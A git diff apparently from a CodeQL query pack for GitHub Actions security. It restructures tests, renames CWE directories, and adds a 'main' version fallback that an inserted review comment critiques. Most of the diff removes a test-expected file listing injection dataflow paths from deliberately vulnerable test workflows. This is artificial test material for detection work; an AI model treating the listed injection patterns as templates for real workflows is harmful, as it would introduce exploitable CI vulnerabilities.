test/query-tests/Security/CWE-829}/.github/workflows/untrusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref diff --git a/.gitignore b/.gitignore index e147f87bf723..6c0e5c58738d 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ **/*.testproj ql/lib/.codeql/ ql/src/.codeql/ +ql/test/.codeql/ 
diff --git a/build-test-dbs.sh b/build-test-dbs.sh deleted file mode 100755 index bb85dc78a376..000000000000 --- a/build-test-dbs.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -rm -rf ql/lib/test/test.testproj || true -rm -rf ql/src/test/test.testproj || true -rm -rf src-test.testproj || true -rm -rf lib-test.testproj || true -codeql database create src-test.testproj -l yaml -s ql/src/test -codeql database create lib-test.testproj -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml index ad62591967d0..f00f92b346f9 100644 --- a/codeql-workspace.yml +++ b/codeql-workspace.yml @@ -1,3 +1,4 @@ provide: - "**/ql/src/qlpack.yml" - - "**/ql/lib/qlpack.yml" \ No newline at end of file + - "**/ql/lib/qlpack.yml" + - "**/ql/test/qlpack.yml" diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c2b1cda8277b..2bbf5c8ac0d7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -270,7 +270,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getCallee() { result = uses.getGitHubRepository() } - override string getVersion() { result = uses.getVersion() } + override string getVersion() { + result = uses.getVersion() + or + not exists(uses.getVersion()) and + result = "main" + } override Expression getArgumentExpr(string key) { exists(Actions::With with | diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index 2fb17eef88bf..fe10441fd67a 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -6,7 +6,6 @@ import codeql.actions.ast.internal.Yaml import codeql.files.FileSystem -// ALVARO: Make it private /** * Libraries for modeling GitHub Actions workflow files written in YAML. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. 
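Review bot: The new `getVersion()` fallback in `StepUsesExpr` synthesizes the string `"main"` for any `uses:` step whose reference carries no version, and nothing downstream can distinguish that value from an explicit `@main`; `UnpinnedActionsTag.ql` in this same commit binds `uses.getVersion() = version` and interpolates it into the alert, so such steps would be reported as `with ref 'main'`, a ref the workflow never wrote. GitHub Actions requires an explicit `@ref` for `owner/repo` actions, so a missing version more likely indicates a local (`./path`) or otherwise non-repository reference than a branch, and whether `getGitHubRepository()` already excludes those cannot be seen from this hunk. Prefer exposing the absence explicitly, e.g. `predicate hasVersion() { exists(uses.getVersion()) }`, or use a sentinel that cannot collide with a real ref, and document the fallback with a QLDoc line such as `/** Gets the ref of the `uses:` value, or "main" when none is written. */`. The `getArgumentExpr` override that follows continues outside the hunk.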
@@ -376,7 +375,6 @@ module Actions { } /** - * ALVARO * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ class Needs extends YamlNode { diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c344549245a..a0f348977abb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -10,7 +10,6 @@ dependencies: codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml -tests: test groups: - yaml dataExtensions: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionSummaries.ql rename to ql/src/Security/CWE-020/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 12bc06481bed..3c951a4e0b0c 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -24,15 +24,15 @@ private predicate isTrustedOrg(string repo) { from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name where uses.getCallee() = repo and - uses.getVersion() = version and uses.getEnclosingWorkflowStmt() = workflow and ( workflow.getName() = name or not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name ) and - not isPinnedCommit(version) and - not isTrustedOrg(repo) + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) select uses, "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckout.md similarity index 100% rename from ql/src/Security/CWE-094/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckout.md 
diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql similarity index 98% rename from ql/src/Security/CWE-094/UntrustedCheckout.ql rename to ql/src/Security/CWE-829/UntrustedCheckout.ql index bb6c0d9a029f..3c745b5d84aa 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -10,7 +10,7 @@ * @id actions/untrusted-checkout * @tags actions * security - * external/cwe/cwe-094 + * external/cwe/cwe-829 */ import actions diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 346079df9842..aff53d45ddeb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -11,4 +11,3 @@ defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true -tests: test diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected deleted file mode 100644 index 49ec00e20f70..000000000000 --- a/ql/src/test/test.expected +++ /dev/null 
@@ -1,162 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... 
g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... 
utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
.ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... 
body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... 
rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} |
-| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| |
-| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files |
-| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] |
-| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
-| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| |
-| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] |
-| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} |
-| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] |
-| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} |
-| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] |
-| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} |
-| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] |
-| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} |
-| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
-| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
-| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] |
-| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} |
-| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} |
-| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}."
|
-subpaths
-| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] |
-#select
-| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. |
-| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. |
-| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. |
-| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. |
-| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ...
tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. |
-| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. |
-| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ...
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. |
-| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. |
-| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. |
-| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. |
-| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. |
-| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. |
-| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. |
-| .github/workflows/test.yml:37:14:37:52 | echo ${ ...
utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. |
-| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. |
-| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. |
diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql
deleted file mode 100644
index f8d6e0c804b6..000000000000
--- a/ql/src/test/test.ql
+++ /dev/null
@@ -1,37 +0,0 @@
